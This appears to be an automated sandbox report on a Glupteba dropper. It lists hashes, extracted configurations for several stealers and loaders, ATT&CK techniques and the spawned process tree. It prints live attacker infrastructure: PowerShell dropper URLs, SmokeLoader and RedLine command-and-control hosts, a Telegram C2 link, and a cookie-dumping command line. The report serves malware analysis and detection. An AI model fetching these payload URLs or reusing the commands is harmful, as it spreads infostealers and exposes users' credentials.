glupteba | 9158bced4a90820fa49d89b6b3bc472858941f70e9f1d5ea3ba96e63a5d6de6a

Analysis

max time kernel
15s
max time network
157s
platform
windows10-2004_x64
resource
win10v2004-en-20220113
submitted
12-03-2022 08:10

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

9158bced4a90820fa49d89b6b3bc472858941f70e9f1d5ea3ba96e63a5d6de6a.exe
Size

9.2MB
MD5

1627690947c17f2138d13d7c846486ea
SHA1

f08510bdc3eafda6e60661989a40834a3fb07be2
SHA256

9158bced4a90820fa49d89b6b3bc472858941f70e9f1d5ea3ba96e63a5d6de6a
SHA512

b84b8aa8ae06ec1d24dbe9bf465684373cb91066b4e5c5bb8d0bffbb5b89209a8495fb70a636a98abb432fe4121c0d12c6f8b8f7cfd960bae502fd732163919d

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://62.204.41.71/cs/SkyDrive.oo

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://62.204.41.71/cs/Fax.oo

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://62.204.41.71/cs/RED.oo

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://62.204.41.71/Offer/Offer.oo

Extracted

Family

socelars

http://www.iyiqian.com/

http://www.xxhufdc.top/

http://www.uefhkice.xyz/

http://www.fcektsy.top/

Extracted

Family

metasploit

Version

windows/single_exec

Extracted

Family

redline

Botnet

AniNEW

liezaphare.xyz:80

Extracted

Family

smokeloader

Version

2020

http://aucmoney.com/upload/

http://thegymmum.com/upload/

http://atvcampingtrips.com/upload/

http://kuapakualaman.com/upload/

http://renatazarazua.com/upload/

http://nasufmutlu.com/upload/

rc4.i32

Extracted

Family

raccoon

Version

1.7.3

Botnet

92be0387873e54dd629b9bfa972c3a9a88e6726c

Attributes

url4cnc
https://t.me/gishsunsetman

rc4.plain

Signatures

Glupteba
Glupteba is a modular loader written in Golang with various components.
loader dropper glupteba

Glupteba Payload 2 IoCs

Processes:

resource	yara_rule
behavioral2/memory/544-203-0x0000000005210000-0x0000000005B36000-memory.dmp	family_glupteba
behavioral2/memory/544-204-0x0000000000400000-0x000000000309E000-memory.dmp	family_glupteba

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit
OnlyLogger
A tiny loader that uses IPLogger to get its payload.
loader onlylogger
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.

Processes:

rUNdlL32.eXe

description pid pid_target process target process

Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2676 4648 rUNdlL32.eXe
Raccoon
Simple but powerful infostealer which was very active in 2019.
stealer raccoon

description	pid	pid_target	process	target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2676	4648	rUNdlL32.eXe

Raccoon Stealer Payload 3 IoCs

Processes:

resource	yara_rule
behavioral2/memory/3868-234-0x0000000000400000-0x0000000000495000-memory.dmp	family_raccoon
behavioral2/memory/3868-236-0x0000000000400000-0x0000000000495000-memory.dmp	family_raccoon
behavioral2/memory/3868-237-0x0000000000400000-0x0000000000495000-memory.dmp	family_raccoon

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine Payload 7 IoCs

Processes:

resource	yara_rule
behavioral2/memory/1964-216-0x0000000000400000-0x000000000041E000-memory.dmp	family_redline
behavioral2/memory/2624-246-0x00000000003A0000-0x00000000005E5000-memory.dmp	family_redline
behavioral2/memory/2624-244-0x00000000003A0000-0x00000000005E5000-memory.dmp	family_redline
behavioral2/memory/2624-253-0x00000000003A0000-0x00000000005E5000-memory.dmp	family_redline
behavioral2/memory/2624-258-0x00000000003A0000-0x00000000005E5000-memory.dmp	family_redline
behavioral2/memory/2624-260-0x00000000003A0000-0x00000000005E5000-memory.dmp	family_redline
behavioral2/memory/2624-254-0x00000000003A0000-0x00000000005E5000-memory.dmp	family_redline

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
stealer socelars

Socelars Payload 2 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\Install.exe	family_socelars
C:\Users\Admin\AppData\Local\Temp\Install.exe	family_socelars

Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar

OnlyLogger Payload 2 IoCs

Processes:

resource	yara_rule
behavioral2/memory/5564-291-0x00000000006E0000-0x0000000000724000-memory.dmp	family_onlylogger
behavioral2/memory/5564-294-0x0000000000400000-0x000000000048C000-memory.dmp	family_onlylogger

Vidar Stealer 1 IoCs

stealer

Processes:

resource	yara_rule
behavioral2/memory/5464-298-0x0000000002120000-0x00000000021CC000-memory.dmp	family_vidar

Creates new service(s) 1 TTPs
persistence

New Service
T1050
Downloads MZ/PE file
Executes dropped EXE 9 IoCs

Processes:

Files.exeKRSetp.exejfiag3g_gg.exeInstall.exemsedge.exeInfo.execleanpro22.exeFolder.exejfiag3g_gg.exe

pid process

1152 Files.exe
1704 KRSetp.exe
2616 jfiag3g_gg.exe
2848 Install.exe
3080 msedge.exe
544 Info.exe
3308 cleanpro22.exe
1452 Folder.exe
3488 jfiag3g_gg.exe
Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031

pid	process
1152	Files.exe
1704	KRSetp.exe
2616	jfiag3g_gg.exe
2848	Install.exe
3080	msedge.exe
544	Info.exe
3308	cleanpro22.exe
1452	Folder.exe
3488	jfiag3g_gg.exe

UPX packed file 6 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\Documents\GVP5VUJt6pJLOq_Jem8heRfq.exe	upx
C:\Users\Admin\Documents\GVP5VUJt6pJLOq_Jem8heRfq.exe	upx

VMProtect packed file 3 IoCs

Detects executables packed with VMProtect commercial packer.

vmprotect

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\md9_1sjm.exe	vmprotect
C:\Users\Admin\AppData\Local\Temp\md9_1sjm.exe	vmprotect
behavioral2/memory/1936-188-0x0000000000400000-0x000000000067D000-memory.dmp	vmprotect

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

9158bced4a90820fa49d89b6b3bc472858941f70e9f1d5ea3ba96e63a5d6de6a.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	9158bced4a90820fa49d89b6b3bc472858941f70e9f1d5ea3ba96e63a5d6de6a.exe

Loads dropped DLL 1 IoCs

Processes:

rundll32.exe

pid process

3568 rundll32.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

pid	process
3568	rundll32.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

Files.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\haleng = "C:\\Users\\Admin\\AppData\\Local\\Temp\\haleng.ex"	Files.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 10 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

6 ipinfo.io
49 ipinfo.io
325 ipinfo.io
326 ipinfo.io
390 ipinfo.io
3 ip-api.com
7 ipinfo.io
337 api.db-ip.com
338 api.db-ip.com
389 ipinfo.io
Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

flow	ioc
6	ipinfo.io
49	ipinfo.io
325	ipinfo.io
326	ipinfo.io
390	ipinfo.io
3	ip-api.com
7	ipinfo.io
337	api.db-ip.com
338	api.db-ip.com
389	ipinfo.io

Program crash 21 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
4292	3568	WerFault.exe	rundll32.exe
4100	4312	WerFault.exe	Litever01.exe
3540	544	WerFault.exe	Info.exe
4520	3868	WerFault.exe	jamesdirect.exe
5192	5364	WerFault.exe	NG5aBR6cbaBeBVSX_wWEy1Yr.exe
4276	5556	WerFault.exe	kOU74Ot0z3aJ1p2kuw4TuRon.exe
6192	5448	WerFault.exe	SCpwVkP0N8CNKXIcqAhl4YoB.exe
5420	5456	WerFault.exe	SjMB2J9g8cphqnNi_zygK4Oo.exe
6628	5564	WerFault.exe	5uZ01eR7MpWL3Be3F3oXwGsN.exe
6364	5364	WerFault.exe	NG5aBR6cbaBeBVSX_wWEy1Yr.exe
5248	3628	WerFault.exe	i269wJdFc3nGq7yKwi5FO8_o.exe
5644	5456	WerFault.exe	SjMB2J9g8cphqnNi_zygK4Oo.exe
6964	6876	WerFault.exe	49Y2e4J33BFeicB5lUR1YLJl.exe
6012	5564	WerFault.exe	5uZ01eR7MpWL3Be3F3oXwGsN.exe
6504	2220	WerFault.exe	0ufAtfCiiOFpEIyBSqPNDzzY.exe
3488	5440	WerFault.exe	vLSwaKyRRInm2t3Yr2GMu8oX.exe
7608	5564	WerFault.exe	5uZ01eR7MpWL3Be3F3oXwGsN.exe
7620	6860	WerFault.exe	d_QfVgpnVVMnP7iWo6bBRXX6.exe
7416	7868	WerFault.exe	explorer.exe
6376	2220	WerFault.exe	0ufAtfCiiOFpEIyBSqPNDzzY.exe
6412	5440	WerFault.exe	vLSwaKyRRInm2t3Yr2GMu8oX.exe

Creates scheduled task(s) 1 TTPs 5 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

6612 schtasks.exe
2412 schtasks.exe
5348 schtasks.exe
7672 schtasks.exe
6292 schtasks.exe

pid	process
6612	schtasks.exe
2412	schtasks.exe
5348	schtasks.exe
7672	schtasks.exe
6292	schtasks.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

msedge.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Kills process with taskkill 3 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exe

pid process

3244 taskkill.exe
6280 taskkill.exe
7636 taskkill.exe
Modifies registry class 1 IoCs

Processes:

msedge.exe

description ioc process

Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ msedge.exe
Suspicious behavior: EnumeratesProcesses 6 IoCs

Processes:

msedge.exemsedge.exeWerFault.exe

pid process

824 msedge.exe
824 msedge.exe
2748 msedge.exe
2748 msedge.exe
3488 WerFault.exe
3488 WerFault.exe
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 2 IoCs

Processes:

msedge.exe

pid process

2748 msedge.exe
2748 msedge.exe

pid	process
3244	taskkill.exe
6280	taskkill.exe
7636	taskkill.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	msedge.exe

pid	process
824	msedge.exe
824	msedge.exe
2748	msedge.exe
2748	msedge.exe
3488	WerFault.exe
3488	WerFault.exe

pid	process
2748	msedge.exe
2748	msedge.exe

Suspicious use of AdjustPrivilegeToken 36 IoCs

Processes:

Install.exeKRSetp.exetaskkill.exe

description	pid	process
Token: SeCreateTokenPrivilege	2848	Install.exe
Token: SeAssignPrimaryTokenPrivilege	2848	Install.exe
Token: SeLockMemoryPrivilege	2848	Install.exe
Token: SeIncreaseQuotaPrivilege	2848	Install.exe
Token: SeMachineAccountPrivilege	2848	Install.exe
Token: SeTcbPrivilege	2848	Install.exe
Token: SeSecurityPrivilege	2848	Install.exe
Token: SeTakeOwnershipPrivilege	2848	Install.exe
Token: SeLoadDriverPrivilege	2848	Install.exe
Token: SeSystemProfilePrivilege	2848	Install.exe
Token: SeSystemtimePrivilege	2848	Install.exe
Token: SeProfSingleProcessPrivilege	2848	Install.exe
Token: SeIncBasePriorityPrivilege	2848	Install.exe
Token: SeCreatePagefilePrivilege	2848	Install.exe
Token: SeCreatePermanentPrivilege	2848	Install.exe
Token: SeBackupPrivilege	2848	Install.exe
Token: SeRestorePrivilege	2848	Install.exe
Token: SeShutdownPrivilege	2848	Install.exe
Token: SeDebugPrivilege	2848	Install.exe
Token: SeAuditPrivilege	2848	Install.exe
Token: SeSystemEnvironmentPrivilege	2848	Install.exe
Token: SeChangeNotifyPrivilege	2848	Install.exe
Token: SeRemoteShutdownPrivilege	2848	Install.exe
Token: SeUndockPrivilege	2848	Install.exe
Token: SeSyncAgentPrivilege	2848	Install.exe
Token: SeEnableDelegationPrivilege	2848	Install.exe
Token: SeManageVolumePrivilege	2848	Install.exe
Token: SeImpersonatePrivilege	2848	Install.exe
Token: SeCreateGlobalPrivilege	2848	Install.exe
Token: 31	2848	Install.exe
Token: 32	2848	Install.exe
Token: 33	2848	Install.exe
Token: 34	2848	Install.exe
Token: 35	2848	Install.exe
Token: SeDebugPrivilege	1704	KRSetp.exe
Token: SeDebugPrivilege	3244	taskkill.exe

Suspicious use of FindShellTrayWindow 2 IoCs

Processes:

msedge.exe

pid process

2748 msedge.exe
2748 msedge.exe
Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

cleanpro22.exe

pid process

3308 cleanpro22.exe

pid	process
2748	msedge.exe
2748	msedge.exe

pid	process
3308	cleanpro22.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

9158bced4a90820fa49d89b6b3bc472858941f70e9f1d5ea3ba96e63a5d6de6a.exeFiles.exemsedge.exemsedge.exeInstall.exe

description	pid	process	target process
PID 572 wrote to memory of 1152	572	9158bced4a90820fa49d89b6b3bc472858941f70e9f1d5ea3ba96e63a5d6de6a.exe	Files.exe
PID 572 wrote to memory of 1152	572	9158bced4a90820fa49d89b6b3bc472858941f70e9f1d5ea3ba96e63a5d6de6a.exe	Files.exe
PID 572 wrote to memory of 1152	572	9158bced4a90820fa49d89b6b3bc472858941f70e9f1d5ea3ba96e63a5d6de6a.exe	Files.exe
PID 572 wrote to memory of 1704	572	9158bced4a90820fa49d89b6b3bc472858941f70e9f1d5ea3ba96e63a5d6de6a.exe	KRSetp.exe
PID 572 wrote to memory of 1704	572	9158bced4a90820fa49d89b6b3bc472858941f70e9f1d5ea3ba96e63a5d6de6a.exe	KRSetp.exe
PID 1152 wrote to memory of 2616	1152	Files.exe	jfiag3g_gg.exe
PID 1152 wrote to memory of 2616	1152	Files.exe	jfiag3g_gg.exe
PID 1152 wrote to memory of 2616	1152	Files.exe	jfiag3g_gg.exe
PID 572 wrote to memory of 2748	572	9158bced4a90820fa49d89b6b3bc472858941f70e9f1d5ea3ba96e63a5d6de6a.exe	msedge.exe
PID 572 wrote to memory of 2748	572	9158bced4a90820fa49d89b6b3bc472858941f70e9f1d5ea3ba96e63a5d6de6a.exe	msedge.exe
PID 572 wrote to memory of 2848	572	9158bced4a90820fa49d89b6b3bc472858941f70e9f1d5ea3ba96e63a5d6de6a.exe	Install.exe
PID 572 wrote to memory of 2848	572	9158bced4a90820fa49d89b6b3bc472858941f70e9f1d5ea3ba96e63a5d6de6a.exe	Install.exe
PID 572 wrote to memory of 2848	572	9158bced4a90820fa49d89b6b3bc472858941f70e9f1d5ea3ba96e63a5d6de6a.exe	Install.exe
PID 2748 wrote to memory of 3816	2748	msedge.exe	msedge.exe
PID 2748 wrote to memory of 3816	2748	msedge.exe	msedge.exe
PID 572 wrote to memory of 3080	572	9158bced4a90820fa49d89b6b3bc472858941f70e9f1d5ea3ba96e63a5d6de6a.exe	msedge.exe
PID 572 wrote to memory of 3080	572	9158bced4a90820fa49d89b6b3bc472858941f70e9f1d5ea3ba96e63a5d6de6a.exe	msedge.exe
PID 572 wrote to memory of 3080	572	9158bced4a90820fa49d89b6b3bc472858941f70e9f1d5ea3ba96e63a5d6de6a.exe	msedge.exe
PID 572 wrote to memory of 544	572	9158bced4a90820fa49d89b6b3bc472858941f70e9f1d5ea3ba96e63a5d6de6a.exe	Info.exe
PID 572 wrote to memory of 544	572	9158bced4a90820fa49d89b6b3bc472858941f70e9f1d5ea3ba96e63a5d6de6a.exe	Info.exe
PID 572 wrote to memory of 544	572	9158bced4a90820fa49d89b6b3bc472858941f70e9f1d5ea3ba96e63a5d6de6a.exe	Info.exe
PID 572 wrote to memory of 3308	572	9158bced4a90820fa49d89b6b3bc472858941f70e9f1d5ea3ba96e63a5d6de6a.exe	cleanpro22.exe
PID 572 wrote to memory of 3308	572	9158bced4a90820fa49d89b6b3bc472858941f70e9f1d5ea3ba96e63a5d6de6a.exe	cleanpro22.exe
PID 572 wrote to memory of 3308	572	9158bced4a90820fa49d89b6b3bc472858941f70e9f1d5ea3ba96e63a5d6de6a.exe	cleanpro22.exe
PID 3080 wrote to memory of 1452	3080	msedge.exe	Folder.exe
PID 3080 wrote to memory of 1452	3080	msedge.exe	Folder.exe
PID 3080 wrote to memory of 1452	3080	msedge.exe	Folder.exe
PID 2848 wrote to memory of 836	2848	Install.exe	cmd.exe
PID 2848 wrote to memory of 836	2848	Install.exe	cmd.exe
PID 2848 wrote to memory of 836	2848	Install.exe	cmd.exe
PID 2748 wrote to memory of 3788	2748	msedge.exe	msedge.exe
PID 2748 wrote to memory of 3788	2748	msedge.exe	msedge.exe
PID 2748 wrote to memory of 3788	2748	msedge.exe	msedge.exe
PID 2748 wrote to memory of 3788	2748	msedge.exe	msedge.exe
PID 2748 wrote to memory of 3788	2748	msedge.exe	msedge.exe
PID 2748 wrote to memory of 3788	2748	msedge.exe	msedge.exe
PID 2748 wrote to memory of 3788	2748	msedge.exe	msedge.exe
PID 2748 wrote to memory of 3788	2748	msedge.exe	msedge.exe
PID 2748 wrote to memory of 3788	2748	msedge.exe	msedge.exe
PID 2748 wrote to memory of 3788	2748	msedge.exe	msedge.exe
PID 2748 wrote to memory of 3788	2748	msedge.exe	msedge.exe
PID 2748 wrote to memory of 3788	2748	msedge.exe	msedge.exe
PID 2748 wrote to memory of 3788	2748	msedge.exe	msedge.exe
PID 2748 wrote to memory of 3788	2748	msedge.exe	msedge.exe
PID 2748 wrote to memory of 3788	2748	msedge.exe	msedge.exe
PID 2748 wrote to memory of 3788	2748	msedge.exe	msedge.exe
PID 2748 wrote to memory of 3788	2748	msedge.exe	msedge.exe
PID 2748 wrote to memory of 3788	2748	msedge.exe	msedge.exe
PID 2748 wrote to memory of 3788	2748	msedge.exe	msedge.exe
PID 2748 wrote to memory of 3788	2748	msedge.exe	msedge.exe
PID 2748 wrote to memory of 3788	2748	msedge.exe	msedge.exe
PID 2748 wrote to memory of 3788	2748	msedge.exe	msedge.exe
PID 2748 wrote to memory of 3788	2748	msedge.exe	msedge.exe
PID 2748 wrote to memory of 3788	2748	msedge.exe	msedge.exe
PID 2748 wrote to memory of 3788	2748	msedge.exe	msedge.exe
PID 2748 wrote to memory of 3788	2748	msedge.exe	msedge.exe
PID 2748 wrote to memory of 3788	2748	msedge.exe	msedge.exe
PID 2748 wrote to memory of 3788	2748	msedge.exe	msedge.exe
PID 2748 wrote to memory of 3788	2748	msedge.exe	msedge.exe
PID 2748 wrote to memory of 3788	2748	msedge.exe	msedge.exe
PID 2748 wrote to memory of 3788	2748	msedge.exe	msedge.exe
PID 2748 wrote to memory of 3788	2748	msedge.exe	msedge.exe
PID 2748 wrote to memory of 3788	2748	msedge.exe	msedge.exe
PID 2748 wrote to memory of 3788	2748	msedge.exe	msedge.exe

C:\Users\Admin\AppData\Local\Temp\9158bced4a90820fa49d89b6b3bc472858941f70e9f1d5ea3ba96e63a5d6de6a.exe
"C:\Users\Admin\AppData\Local\Temp\9158bced4a90820fa49d89b6b3bc472858941f70e9f1d5ea3ba96e63a5d6de6a.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:572

C:\Users\Admin\AppData\Local\Temp\Files.exe
"C:\Users\Admin\AppData\Local\Temp\Files.exe"
2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:1152

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
3⤵
- Executes dropped EXE
PID:2616

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
3⤵
- Executes dropped EXE
PID:3488

C:\Users\Admin\AppData\Local\Temp\KRSetp.exe
"C:\Users\Admin\AppData\Local\Temp\KRSetp.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1704

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/1wNij7
2⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:2748

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffcdf1546f8,0x7ffcdf154708,0x7ffcdf154718
3⤵
PID:3816

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2084,16778364209407819018,1597146942280615748,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2120 /prefetch:2
3⤵
PID:3788

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2084,16778364209407819018,1597146942280615748,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2200 /prefetch:3
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:824

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2084,16778364209407819018,1597146942280615748,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2784 /prefetch:8
3⤵
PID:3532

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,16778364209407819018,1597146942280615748,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3364 /prefetch:1
3⤵
PID:2100

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,16778364209407819018,1597146942280615748,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3372 /prefetch:1
3⤵
PID:864

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2084,16778364209407819018,1597146942280615748,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5188 /prefetch:8
3⤵
PID:3604

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,16778364209407819018,1597146942280615748,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5700 /prefetch:1
3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3080

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,16778364209407819018,1597146942280615748,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5672 /prefetch:1
3⤵
PID:2764

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2084,16778364209407819018,1597146942280615748,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6188 /prefetch:8
3⤵
PID:1276

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings
3⤵
PID:5924

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x22c,0x230,0x234,0x208,0x238,0x7ff68ba05460,0x7ff68ba05470,0x7ff68ba05480
4⤵
PID:5976

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2084,16778364209407819018,1597146942280615748,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6188 /prefetch:8
3⤵
PID:6068

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2084,16778364209407819018,1597146942280615748,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4500 /prefetch:2
3⤵
PID:7548

